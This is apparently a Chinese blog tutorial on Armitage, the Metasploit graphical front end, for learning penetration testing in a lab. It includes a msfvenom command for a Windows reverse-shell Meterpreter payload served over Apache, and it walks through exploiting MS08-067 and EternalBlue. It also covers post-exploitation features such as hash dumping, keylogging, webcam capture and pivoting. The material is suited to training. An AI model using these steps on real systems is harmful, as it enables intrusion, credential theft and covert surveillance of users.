Kali Linux 渗透测试图形化利器——Armitage 全流程实战指南

Armitage 是 Metasploit 的图形化前端工具,极大降低了渗透测试的门槛,尤其适合初学者和教学演示。本文将带你快速上手 Armitage 的安装、配置、漏洞利用及后渗透操作全过程。


一、什么是 Armitage?

Armitage 是一款为 Metasploit 提供图形界面的工具,主要功能包括:

  • 主机扫描与发现
  • 漏洞模块调用与利用
  • Meterpreter 会话管理
  • 多主机协同攻击支持

通过图形化界面,你可以拖拽目标,点击按钮,完成命令行中繁琐的操作,特别适合教学和入门渗透测试者。


二、Armitage 的启动方式

在 Kali Linux 中,启动 Armitage 前需要初始化 PostgreSQL 数据库:

service postgresql start
msfdb init

启动 Armitage 有两种方法:

  • 菜单启动:Applications → Kali Linux → Exploitation Tools → Armitage
  • 命令行启动:输入 armitage

三、生成攻击载荷与控制端

Armitage 支持通过图形界面生成被控端(payload)和监听端(multi/handler):

1. 生成被控端

选择 Payload 输出为 EXE,即可生成可执行文件,相当于命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=端口 -f exe > shell.exe

在这里插入图片描述

将生成的 shell.exe 文件放置到 Web 根目录下:

cp shell.exe /var/www/html/
service apache2 start

靶机访问该文件并执行后,监听端即可接收到连接,建立 Meterpreter 会话。

在这里插入图片描述

在这里插入图片描述


四、网络扫描:识别目标主机

在 Armitage 中可调用 Nmap 进行图形化扫描:

步骤:

  1. 菜单选择:Hosts → Nmap Scan → Quick Scan(OS detect)
    在这里插入图片描述

  2. 输入网段:如 192.168.128.0/24
    在这里插入图片描述

  3. 查看结果:发现在线主机、开放端口和操作系统信息
    在这里插入图片描述

这相当于执行以下命令行:

nmap --min-hostgroup 96 -sV -n -T4 -O -F --version-light 192.168.128.0/24

五、漏洞利用实战

案例 1:利用 ms08_067 攻击 Windows XP

目标:IP 192.168.128.131

  1. 在模块搜索框中输入 ms08_067

  2. 双击模块,输入目标 IP,勾选 “Use a reverse connection”

  3. 点击 Launch 发动攻击
    在这里插入图片描述

  4. 若成功,控制台会显示新会话(Session)
    在这里插入图片描述

注意: 本攻击模块使用端口 445,若 apache2 占用需先关闭:

service apache2 stop

案例 2:利用 ms17_010 攻击 Windows 7

目标:IP 192.168.128.130(永恒之蓝靶机)

操作同上,选择模块 ms17_010_eternalblue,填写 IP 并执行攻击。
在这里插入图片描述

若成功,Armitage 界面中目标主机图标会变色,提示已建立 Meterpreter 会话。
在这里插入图片描述


六、后渗透阶段操作

通过 Meterpreter,Armitage 提供丰富的后渗透工具:

1. Access(访问控制)

  • Dump Hashes:获取系统哈希值(模拟密码抓取)

2. Interact(交互)

  • 打开远程命令行窗口,执行系统命令

3. Explore(系统探索)

  • Browse Files:浏览目标文件系统
  • Screenshot:截图目标桌面
  • Log Keystrokes:记录键盘输入
  • Webcam Snap:拍摄摄像头图像

4. Pivoting(横向移动)

  • 将当前主机作为跳板,攻击内网其他主机

5. ARP Scan

  • 利用目标主机对其所在子网进行扫描,发现更多资产

七、案例演示:键盘记录

  1. 通过 Explore → Log Keystrokes 启动键盘监听器
    在这里插入图片描述
    在这里插入图片描述

  2. 在靶机打开记事本并输入内容
    在这里插入图片描述

  3. 控制端窗口实时显示用户输入的内容(如密码、账号等)
    在这里插入图片描述


八、总结

Armitage 以图形化方式呈现了 Metasploit 的强大功能,降低了学习曲线,适合初学者掌握渗透测试基本流程。通过本篇实战,我们完成了:

  • 环境配置
  • payload 生成与部署
  • 网络扫描
  • 漏洞利用
  • 后渗透操作

未来可尝试结合 Cobalt Strike 等高级框架进行实战演练,迈向更高阶的红队实战之路。


如果你觉得这篇文章对你有帮助,欢迎点赞、评论、收藏!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dash_Block

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值